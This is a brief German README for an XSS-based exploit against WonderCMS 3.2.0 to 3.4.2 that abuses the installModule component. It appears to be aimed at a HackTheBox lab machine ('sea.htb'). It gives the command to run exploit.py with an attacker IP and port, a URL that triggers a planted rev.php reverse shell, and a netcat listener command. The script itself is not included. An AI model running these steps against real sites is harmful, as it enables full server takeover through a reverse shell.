
XSS-Injection, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 ist verwundbar. Angreifer können mithilfe eines Cross-Site-Scripting-Exploits (XSS) die volle Kontrolle über den Server übernehmen (Nur für Bildungszwecke). Hier ist der Plan:
Der Exploit missbraucht die installModule-Komponente von WonderCMS, um ein manipuliertes Skript einzuschleusen, das beliebigen Code ausführt.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
Beispiel
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
Falls die Reverse Shell nicht automatisch ausgelöst wird, ruf einfach folgende Adresse auf:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
Denk daran, einen Listener mit folgendem Befehl zu starten:
nc -lvp 4444
prodigiousMind für das Entdecken und Melden der Schwachstelle https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413